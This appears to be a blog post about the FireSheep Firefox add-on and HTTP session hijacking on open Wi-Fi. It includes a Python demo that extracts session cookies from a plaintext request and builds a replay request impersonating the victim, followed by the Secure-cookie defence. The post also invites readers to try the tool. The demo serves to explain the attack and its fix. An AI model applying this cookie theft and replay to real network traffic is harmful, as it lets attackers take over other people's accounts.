FireSheep Steals Session Cookies On Sites Like Twitter And Facebook

Recent news of a Firefox web browser add-on has sparked a lot of interest. Well, that’s only because the add-on lets you “steal” session cookies on an open, unencrypted Wi-Fi network and gain access to other people’s Facebook or Twitter accounts with a couple of clicks. Talk about hacking made easy.


First, there’s Firefox, and now there’s FireSheep. In case you are wondering, FireSheep isn’t a web browser; it is an add-on to the popular Firefox web browser. (It’s just odd that the add-on is named after a different animal, whatever that means.) So what’s so special about FireSheep? The add-on lets almost anybody scan an open Wi-Fi network, capture the cookies other users’ browsers send in the clear, and hijack their logged-in sessions on web services like Facebook and Twitter. In short, a hack tool.

Coded by Eric Butler, a Seattle-based freelance Web application developer, FireSheep was designed to show the danger of accessing unencrypted Web sites from public Wi-Fi spots.

It’s extremely common for websites to protect your password by serving the login itself over HTTPS, but surprisingly uncommon for websites to encrypt everything else. After you log in, the browser sends the session cookie with every plain HTTP request to that site, which leaves the cookie (and the user) vulnerable. HTTP session hijacking (sometimes called “sidejacking”) is when an attacker gets hold of a user’s cookie and replays it, allowing them to do anything the user can do on that website without ever knowing the password. On an open wireless network, cookies are basically shouted through the air, making these attacks extremely easy: the attacker only has to listen. The fix is on the site’s side: serve every page over HTTPS and mark the session cookie Secure so the browser never sends it over plain HTTP.
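To make the attack concrete, here is an added example (not code from FireSheep or from the original post) that does, over a constructed plaintext HTTP request, what a sidejacking tool does with a real capture: pull the session cookie out of the Cookie header, build the replay request that impersonates the victim, and show why a cookie set with the Secure attribute would not have been on the wire in the first place. The host names, cookie names and token value are assumptions made up for the demo; a real tool would feed `sidejack()` from a packet capture instead of an inline byte string.

```python
"""Sidejacking demo: extract a session cookie from a plaintext HTTP request
captured on an open Wi-Fi network, replay it, and check the Secure defence.
"""

# Which cookie names carry the login session for each site.  A sidejacking
# tool keeps a per-site list like this; these hosts and names are assumptions
# for the demo, not the cookie names any real site uses.
SESSION_COOKIES = {
    "www.example-social.test": ["sess_id"],
    "www.example-micro.test": ["auth_token"],
}

# Constructed request, as it appears in the clear when a client that logged in
# over HTTPS then browses the rest of the site over plain HTTP.
CAPTURED_REQUEST = (
    b"GET /home HTTP/1.1\r\n"
    b"Host: www.example-social.test\r\n"
    b"User-Agent: Mozilla/5.0\r\n"
    b"Cookie: lang=en; sess_id=9f2c4a7e; tracking=abc\r\n"
    b"\r\n"
)


def parse_request(raw: bytes):
    """Split a raw HTTP/1.1 request into (request line, {header: value})."""
    head, _, _ = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def parse_cookie_header(value: str) -> dict:
    """Turn 'a=1; b=2' into {'a': '1', 'b': '2'}."""
    jar = {}
    for part in value.split(";"):
        name, _, val = part.strip().partition("=")
        if name:
            jar[name] = val
    return jar


def sidejack(raw: bytes):
    """Return (host, {session cookies}) if the request leaks a session, else None."""
    _, headers = parse_request(raw)
    host = headers.get("host")
    wanted = SESSION_COOKIES.get(host)
    if not wanted or "cookie" not in headers:
        return None
    jar = parse_cookie_header(headers["cookie"])
    stolen = {name: jar[name] for name in wanted if name in jar}
    return (host, stolen) if stolen else None


def replay_request(host: str, cookies: dict, path: str = "/home") -> bytes:
    """Build the request the attacker sends to act as the victim: no password
    is needed, only the cookie the site treats as proof of login."""
    cookie_hdr = "; ".join(f"{k}={v}" for k, v in cookies.items())
    return (
        f"GET {path} HTTP/1.1\r\nHost: {host}\r\nCookie: {cookie_hdr}\r\n\r\n"
    ).encode()


def cookie_sent_over_http(set_cookie: str) -> bool:
    """The defence: a browser never sends a cookie carrying the Secure
    attribute over plain http://, so it cannot appear in a capture like the
    one above.  Returns True if the cookie WOULD be sent in the clear."""
    attrs = [a.strip().lower() for a in set_cookie.split(";")[1:]]
    return "secure" not in attrs


if __name__ == "__main__":
    leak = sidejack(CAPTURED_REQUEST)
    print("leaked:", leak)
    if leak:
        print(replay_request(*leak).decode())
    print("Secure cookie on the wire?",
          cookie_sent_over_http("sess_id=9f2c4a7e; Path=/; Secure; HttpOnly"))
```

The point of the two halves is that the attack needs nothing clever: once the cookie is on the wire in the clear, replaying it is a one-line request. The Secure attribute (together with serving the whole site over HTTPS) removes the capture opportunity rather than trying to detect the replay.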

You can try out the free, open source FireSheep at http://codebutler.github.com/firesheep ; the add-on is currently available for Mac OS X and Windows, and a Linux version is on the way.

Source: codebutler